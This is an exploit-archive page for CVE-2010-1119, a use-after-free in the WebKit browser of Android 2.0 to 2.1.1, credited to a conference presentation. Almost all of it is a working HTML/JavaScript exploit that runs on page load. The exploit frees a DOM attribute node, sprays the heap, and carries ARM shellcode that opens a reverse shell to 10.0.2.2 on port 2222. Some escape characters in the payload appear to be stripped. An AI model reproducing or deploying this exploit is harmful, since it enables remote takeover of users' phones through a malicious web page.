Home / exploits Android 2.0 / 2.1 / 2.1.1 WebKit Use-After-Free
Posted on 15 March 2011
<html> <!-- # Exploit Title: android exploit for 2010-1119 use after free # Date: 2011/03/11 # Author: MJ Keith # Software Link: http://www.android.com/ # Version: 2.0 ,2.1 , 2.1.1 # Tested on: Android # CVE : 2010-1119 This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides email: mkeith AT exploitscience.org --> <head> <script language="JavaScript"> function heap() { var id = document.getElementById("target"); var attribute = id.getAttributeNode('id'); nodes = attribute.childNodes; document.body.removeChild(id); attribute.removeChild(nodes[0]); setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("u0058u0058")); }; var scode = unescape("u0060u0060"); var scode2 = unescape("u5005ue1a0"); var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0\nu708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002"); shell += unescape("uae08"); // Port = 2222 shell += unescape("u000au0202"); // IP = 10.0.2.2 shell += unescape("u2000u2000"); // string terminate do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 300; i++){ if (i<130){ target[i] = scode;} if (i>130){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>250){ // alert("freeze"); nodes[0].textContent} } }, 0); } </script> </head> <body onload=heap()> <p id=target></p> </body> </html>
